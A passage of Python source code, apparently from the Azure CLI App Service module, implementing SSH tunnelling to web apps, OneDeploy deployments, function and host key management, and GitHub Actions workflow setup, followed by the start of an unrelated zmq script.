_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
endpoint_binder.py
|
import zmq
import time
import sys, json
from random import randrange, randint
import random
